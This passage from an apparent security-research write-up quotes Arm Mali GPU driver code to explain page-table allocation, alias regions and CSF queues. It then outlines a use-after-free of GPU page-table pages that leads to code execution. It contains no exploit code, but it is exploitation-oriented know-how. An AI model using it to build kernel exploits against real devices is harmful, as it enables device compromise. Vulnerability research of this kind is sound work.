			<span class="n">kbase_mem_pool_add_array</span><span class="p">(</span><span class="n">next_pool</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
					<span class="n">pages</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="nb">true</span><span class="p">,</span> <span class="n">dirty</span><span class="p">);</span>
			<span class="n">i</span> <span class="o">+=</span> <span class="n">nr_to_pool</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="cm">/* Free any remaining pages to kernel */</span>
	<span class="k">for</span> <span class="p">(;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">as_page</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
		<span class="n">kbase_mem_pool_free_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
		<span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">as_tagged</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now, in order to map entries in the GPU page table to allocated physical pages, <code class="language-plaintext highlighter-rouge">mmap</code> has to be
used when a cookie is returned. Calling <code class="language-plaintext highlighter-rouge">mmap</code> from userspace ultimately leads to a call of
<code class="language-plaintext highlighter-rouge">kbase_gpu_mmap</code> when using a cookie meant for memory allocation. <code class="language-plaintext highlighter-rouge">kbase_gpu_mmap</code> will
attempt to insert entries in the GPU page table using <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages</code>, using the
<code class="language-plaintext highlighter-rouge">reg-&gt;start_pfn</code> [1] to navigate the page table and create entries at the appropriate page table
level.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_gpu_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		   <span class="n">u64</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">,</span>
		   <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">==</span> <span class="n">KBASE_MEM_TYPE_ALIAS</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mmu_insert_pages</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mmu</span><span class="p">,</span>
				     <span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
				     <span class="n">kbase_get_gpu_phy_pages</span><span class="p">(</span><span class="n">reg</span><span class="p">),</span>
				     <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">),</span>
				     <span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">gwt_mask</span><span class="p">,</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">as_nr</span><span class="p">,</span>
				     <span class="n">group_id</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The Mali GPU employs a 4-level page table with levels 0 to 3, where a page global directory
(PGD) on each level contains 512 entries with each entry pointing to a PGD on the next level
(with the exception of the lowest level, level 3, where each PGD entry points to the backing physical page). The top
level PGD is pointed to by <code class="language-plaintext highlighter-rouge">kctx-&gt;mmu.pgd</code> and navigation of the GPU page tables begins from
there. Thus, each process that uses the Mali driver (and by extension each <code class="language-plaintext highlighter-rouge">kbase_context</code>) will
have a GPU page table of its own. When inserting pages into the GPU page table,
<code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> inserts up to 512 pages at a time starting from
<code class="language-plaintext highlighter-rouge">start_vpfn</code> (the parameter for the argument <code class="language-plaintext highlighter-rouge">reg-&gt;start_pfn</code>), and allocates new PGDs whenever necessary.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mmu_insert_pages_no_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
				    <span class="k">const</span> <span class="n">u64</span> <span class="n">start_vpfn</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">phys</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr</span><span class="p">,</span>
				    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
				    <span class="kt">int</span> <span class="k">const</span> <span class="n">group_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">phys_addr_t</span> <span class="n">pgd</span><span class="p">;</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">pgd_page</span><span class="p">;</span>
	<span class="n">u64</span> <span class="n">insert_vpfn</span> <span class="o">=</span> <span class="n">start_vpfn</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">remain</span> <span class="o">=</span> <span class="n">nr</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_mmu_mode</span> <span class="k">const</span> <span class="o">*</span><span class="n">mmu_mode</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">remain</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vindex</span> <span class="o">=</span> <span class="n">insert_vpfn</span> <span class="o">&amp;</span> <span class="mh">0x1FF</span><span class="p">;</span>
		<span class="c1">// KBASE_MMU_PAGE_ENTRIES = 512</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">KBASE_MMU_PAGE_ENTRIES</span> <span class="o">-</span> <span class="n">vindex</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>
		<span class="kt">int</span> <span class="n">cur_level</span><span class="p">;</span>
		<span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">num_of_valid_entries</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">remain</span><span class="p">)</span>
			<span class="n">count</span> <span class="o">=</span> <span class="n">remain</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="k">do</span> <span class="p">{</span>
			<span class="c1">// cur_level = 3 for normal 4KB pages</span>
			<span class="n">err</span> <span class="o">=</span> <span class="n">mmu_get_pgd_at_level</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">mmut</span><span class="p">,</span> <span class="n">insert_vpfn</span><span class="p">,</span>
					   <span class="n">cur_level</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pgd</span><span class="p">);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">!=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">)</span>
				<span class="k">break</span><span class="p">;</span>
			<span class="cm">/* Fill the memory pool with enough pages for
			 * the page walk to succeed
			 */</span>
			<span class="n">rt_mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">mmu_lock</span><span class="p">);</span>
			<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_pool_grow</span><span class="p">(</span>
				<span class="o">&amp;</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
				<span class="n">cur_level</span><span class="p">);</span>
			<span class="n">rt_mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">mmu_lock</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">err</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">mmu_get_pgd_at_level</code> calls <code class="language-plaintext highlighter-rouge">mmu_get_next_pgd</code> to iteratively find the PGD at the next level,
until a PGD at the desired level is found. On each call to <code class="language-plaintext highlighter-rouge">mmu_get_next_pgd</code>, if the current PGD
holds a valid entry to the next level’s PGD, that PGD is returned. If not, a new PGD is allocated
using <code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">mmu_get_next_pgd</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
		<span class="n">phys_addr_t</span> <span class="o">*</span><span class="n">pgd</span><span class="p">,</span> <span class="n">u64</span> <span class="n">vpfn</span><span class="p">,</span> <span class="kt">int</span> <span class="n">level</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">vpfn</span> <span class="o">&gt;&gt;=</span> <span class="p">(</span><span class="mi">3</span> <span class="o">-</span> <span class="n">level</span><span class="p">)</span> <span class="o">*</span> <span class="mi">9</span><span class="p">;</span>
    <span class="n">vpfn</span> <span class="o">&amp;=</span> <span class="mh">0x1FF</span><span class="p">;</span>

    <span class="n">p</span> <span class="o">=</span> <span class="n">pfn_to_page</span><span class="p">(</span><span class="n">PFN_DOWN</span><span class="p">(</span><span class="o">*</span><span class="n">pgd</span><span class="p">));</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">kmap</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">page</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">dev_warn</span><span class="p">(</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">dev</span><span class="p">,</span> <span class="s">"%s: kmap failure</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__func__</span><span class="p">);</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">target_pgd</span> <span class="o">=</span> <span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mmu_mode</span><span class="o">-&gt;</span><span class="n">pte_to_phy_addr</span><span class="p">(</span><span class="n">page</span><span class="p">[</span><span class="n">vpfn</span><span class="p">]);</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">target_pgd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">target_pgd</span> <span class="o">=</span> <span class="n">kbase_mmu_alloc_pgd</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">mmut</span><span class="p">);</span>
        <span class="p">...</span>
    <span class="p">}</span>
    <span class="p">...</span>
    <span class="o">*</span><span class="n">pgd</span> <span class="o">=</span> <span class="n">target_pgd</span><span class="p">;</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="alloc_pgd"></a><code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code> allocates a page from the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">phys_addr_t</span> <span class="nf">kbase_mmu_alloc_pgd</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">]);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
	<span class="k">return</span> <span class="n">page_to_phys</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After getting the required PGD, <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> then inserts an address translation entry (ATE) in the PGD for each corresponding physical page that needs to be mapped.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mmu_insert_pages_no_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
				    <span class="k">const</span> <span class="n">u64</span> <span class="n">start_vpfn</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">phys</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr</span><span class="p">,</span>
				    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
				    <span class="kt">int</span> <span class="k">const</span> <span class="n">group_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">u64</span> <span class="n">insert_vpfn</span> <span class="o">=</span> <span class="n">start_vpfn</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">remain</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vindex</span> <span class="o">=</span> <span class="n">insert_vpfn</span> <span class="o">&amp;</span> <span class="mh">0x1FF</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">KBASE_MMU_PAGE_ENTRIES</span> <span class="o">-</span> <span class="n">vindex</span><span class="p">;</span> <span class="c1">// KBASE_MMU_PAGE_ENTRIES = 512</span>
		<span class="p">...</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">pfn_to_page</span><span class="p">(</span><span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">pgd</span><span class="p">));</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">cur_level</span> <span class="o">==</span> <span class="n">MIDGARD_MMU_LEVEL</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
				<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">ofs</span> <span class="o">=</span> <span class="n">vindex</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
				<span class="n">u64</span> <span class="o">*</span><span class="n">target</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">pgd_page</span><span class="p">[</span><span class="n">ofs</span><span class="p">];</span>

				<span class="n">WARN_ON</span><span class="p">((</span><span class="o">*</span><span class="n">target</span> <span class="o">&amp;</span> <span class="mi">1UL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">);</span>
				<span class="o">*</span><span class="n">target</span> <span class="o">=</span> <span class="n">kbase_mmu_create_ate</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span>
					<span class="n">phys</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">flags</span><span class="p">,</span> <span class="n">cur_level</span><span class="p">,</span> <span class="n">group_id</span><span class="p">,</span> <span class="n">nr</span><span class="p">);</span>
			<span class="p">}</span>
			<span class="n">num_of_valid_entries</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">mmu_mode</span><span class="o">-&gt;</span><span class="n">set_num_valid_entries</span><span class="p">(</span><span class="n">pgd_page</span><span class="p">,</span> <span class="n">num_of_valid_entries</span><span class="p">);</span>

		<span class="n">phys</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="n">insert_vpfn</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="n">remain</span> <span class="o">-=</span> <span class="n">count</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="pgd_alloc_for_exp"></a>When any PGD entry for the next level is invalid in the process of retrieving the lowest level PGD (level 3), the PGD will be allocated using <code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code>. In the case that we want to ensure a PGD gets allocated, we either need one of these PGDs at any level to not be allocated yet, or simply ensure that <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> maps more than 512 pages, which will force the next level 3 PGD to be allocated, since each level 3 PGD can only hold 512 entries. This will be important in exploiting the vulnerability later.</p>

<p>Another type of memory allocation that can be done is a memory alias operation, called with the
ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code>. The <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code> function handles this and basically it
allows for a new GPU VA region to contain mappings to physical pages of regions that already
existed prior to the operation. The mapping could start from a particular offset (in pages) in the
backing region if desired and the new alias region could be used for mapping to ranges of
physical pages from multiple regions. For example, one could have two regions allocated with 2
pages each and then create an alias mapping of 4 pages to map to both the regions’ physical
pages. To illustrate how an alias region can be configured, the following would map the alias region’s first page to physical page 1 of region 1 and
alias region’s page 2 and 3 to physical pages 0 and 1 of region 2 respectively.</p>

<p><img src="/assets/mali-csf-exploit/fig1-alias-region-mapping.png" alt="Alias region mapping example: the alias region's Page 0 maps to Region 1's backing Page 1, Page 1 is unmapped, and Pages 2 and 3 map to Region 2's backing Pages 0 and 1 respectively." /></p>

<h2 id="command-stream-frontend-csf">Command Stream Frontend (CSF)</h2>

<p>The idea behind the command stream frontend implementation is the use of queues to
represent a command stream that can be used to submit instructions to the GPU. This
circumvents the need to encapsulate a series of GPU instructions into a GPU job that is
thereafter submitted to the driver for processing. Instructions in the CSF can be fed sequentially
into the GPU as a stream and multiple streams can exist at once, with all of them being
controlled by the same queue group. The handling of these instructions is done by the CSF
firmware which was introduced with the GPUs that implement this new architecture. The
firmware runs on a dedicated MCU to offload some computational burden from the main processor. It interacts with the GPU hardware and performs actions such as
loading instructions to the GPU and keeping track of the GPU status. The CSF makes use of
<code class="language-plaintext highlighter-rouge">struct kbase_kcpu_command_queue</code> to handle commands meant for CPU processing,
analogous to a softjob in the old job manager implementation. These kcpu queues allow for
operations such as importing user buffer memory or for JIT allocations of GPU memory. These
queues can be created with the ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_KCPU_QUEUE_CREATE</code> and jobs can be
enqueued on them with <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_KCPU_QUEUE_ENQUEUE</code>. Hence, JIT memory
can be easily allocated and freed using this ioctl, which will be shown to be important for exploiting the vulnerability.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_kcpu_queue_enqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_kcpu_queue_enqueue</span> <span class="o">*</span><span class="n">enq</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_kcpu_command_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">user_cmds</span> <span class="o">=</span> <span class="n">u64_to_user_ptr</span><span class="p">(</span><span class="n">enq</span><span class="o">-&gt;</span><span class="n">addr</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">enq</span><span class="o">-&gt;</span><span class="n">nr_commands</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">ret</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">,</span> <span class="o">++</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">kcpu_queues</span><span class="p">.</span><span class="n">num_cmds</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">struct</span> <span class="n">base_kcpu_command</span> <span class="n">command</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">command</span><span class="p">,</span> <span class="n">user_cmds</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">command</span><span class="p">)))</span> <span class="p">{</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="p">...</span>
		<span class="k">switch</span> <span class="p">(</span><span class="n">command</span><span class="p">.</span><span class="n">type</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">case</span> <span class="n">BASE_KCPU_COMMAND_TYPE_JIT_ALLOC</span><span class="p">:</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_kcpu_jit_allocate_prepare</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">command</span><span class="p">.</span><span class="n">info</span><span class="p">.</span><span class="n">jit_alloc</span><span class="p">,</span> <span class="n">kcpu_cmd</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="k">case</span> <span class="n">BASE_KCPU_COMMAND_TYPE_JIT_FREE</span><span class="p">:</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_kcpu_jit_free_prepare</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">command</span><span class="p">.</span><span class="n">info</span><span class="p">.</span><span class="n">jit_free</span><span class="p">,</span> <span class="n">kcpu_cmd</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">kthread_queue_work</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">kcpu_queues</span><span class="p">.</span><span class="n">csf_kcpu_worker</span><span class="p">,</span>
			<span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">work</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Meanwhile, there is another type of queue in the CSF framework, used for submitting
instructions to the GPU. This queue can be created with <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl call and the consequent <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code> function will attempt to create a
queue that uses a user specified GPU memory region as a ring buffer for command insertion. The enclosing region is looked up via the user-supplied address and is set with the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> [1] flag to prevent freeing from
userspace while the region is in use by the queue.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">csf_queue_register_internal</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="c1">// user controlled struct</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register_ex</span> <span class="o">*</span><span class="n">reg_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue_addr</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">;</span>
	<span class="n">queue_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_size</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
					    <span class="n">queue_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span> <span class="o">=</span> <span class="n">kctx</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">=</span> <span class="n">queue_addr</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span> <span class="o">=</span> <span class="n">region</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue_size</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">KBASEP_IF_NR_INVALID</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="the-vulnerability">The vulnerability</h1>

<p>The vulnerability involves the improper removal of a protective flag for an allocated JIT region, allowing abuse of alias allocations to cause a UAF of GPU page table pages, which allows arbitrary control of page table entries that can easily be leveraged to achieve code execution.</p>

